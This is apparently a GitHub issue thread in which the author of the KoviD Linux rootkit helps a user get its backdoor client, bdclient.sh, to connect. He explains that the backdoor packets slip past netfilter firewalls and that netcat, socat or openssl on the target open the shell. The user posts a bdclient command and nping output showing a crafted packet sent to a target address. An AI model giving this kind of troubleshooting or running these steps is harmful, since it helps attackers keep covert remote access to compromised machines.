carloslack
commented
1 year ago Hi @mmuncan1980 , as a general rule, when first running KoviD I advice that you open another terminal in the target machine (the one running KoviD) with dmesg -w and keep an eye on the log. If , when running bdclient.sh you see in the log something like
Waiting for event
Got event
then it means that communication between the backdoor and the client is OK, otherwise it is not hitting the target machine. As for a firewall, KoviD handles the backdoor packets before they are forwarded to netfilter, therefor a firewall attempting to block ICMP packets the client backdoor sends, will fail and the rootkit will see the packets anyway.
Another thing is that we have 3 main ways to connect: netcat, socat, , openssl , for each of these methods the binary must be available in the target machine, I mean, openssl must be available , same is true for socat and netcat, otherwise it will fail to connect in similar fashion you've seen: silently.
My suggestion is that you first install netcat in the target machine and try using that connection method because is the most simple and doesn't involve encryption.
ps: also notice that, as I state in the README, openssl is problematic in some platforms for reasons I don't know, there is an issue open related to that,
mmuncan1980
I tried several OS's (CentOS 7, Ubuntu 20 and 18 and Kali) and everytime i try to connect with bdclient it gives me the following back:
root@kali:/home/xxx/Downloads/KoviD/scripts# V=3 ./bdclient.sh openssl x.x.x.x 443 Using default temp DH parameters ACCEPT
Starting Nping 0.7.93 ( https://nmap.org/nping ) at 2023-01-07 12:40 CET SENT (0.0450s) TCP x.x.x.x:443 > 210.119.103.61:443 RPA ttl=64 id=46607 iplen=40 seq=2045339016 win=1480
Max rtt: N/A | Min rtt: N/A | Avg rtt: N/A Raw packets sent: 1 (40B) | Rcvd: 0 (0B) | Lost: 1 (100.00%) Nping done: 1 IP address pinged in 1.08 seconds
what do i have to change to gewt it to work?
p.s.: there is no firewall between the 2 servers!